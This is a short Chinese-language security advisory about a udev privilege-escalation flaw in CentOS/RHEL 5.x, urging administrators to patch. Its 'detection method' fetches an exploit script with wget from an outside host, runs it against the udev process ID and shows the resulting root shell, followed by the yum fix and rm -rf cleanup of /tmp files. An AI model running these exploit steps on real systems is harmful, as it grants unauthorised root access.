CentOS/RHEL 5.x(除了5.3)都有效,而對2.4系列的則無效,對於CentOS/RHEL 4.x 經過測試,按本文攻擊方法無效,但是否真的無效還有待真正高手驗證!請大家必須打起12分精神。趕緊升級。ExtMail團隊已經將所有我們掌控的Linux伺服器(2.6 kernel,5.x 系列)全部升級完畢。以下是檢測方法和升級方法,請路過使用受影響的linux系統的朋友一定要參考並升級,否則很容易出問題。這次可以通過任意web程式來實現攻擊,而且成功率幾乎100%。
檢測方法:
1)下載攻擊指令碼:
wget http://www.linuxidc.com/system/systembak/exploit-udev-8478.txt
2)獲得udev進程號
執行:ps ax|grep udev|grep -v grep|awk {print $1} 獲得udev進程號,然後將此數字減1作為
exploit-udev-8478的參數,例如命令結果為143則參數為142
3)執行:
sh exploit-udev-8478 142
suid.c: In function ‘main’:
suid.c:3: warning: incompatible implicit declaration of built-in function ‘execl’
sh-3.1#
然後id 看看:
uid=0(root) gid=0(root) groups=65530(hzqbbc)
順利獲得root許可權,如果無法獲得root許可權,要多執行指令碼幾次,一般第二次即可獲得root許可權。
解決/預防方法
唯一的就是要立刻升級udev軟體包,此軟體包升級後不需要重啟動。方法很簡單,請升級對應版本的官方最新udev,尤其要注意查看是否將這個漏洞補掉,EMOS使用者可以很簡單的用yum升級:
yum update udev
升級完畢後再用檢測方法檢測一遍以確保沒有問題!強烈建議再重新做檢測時,執行以下命令清除掉上一次入侵成功的臨時檔案,否則升級完也會攻擊成功的。
以root許可權執行:
引用:
rm -rf /tmp/libno_ex*
rm -rf /tmp/suid
rm -rf /tmp/udev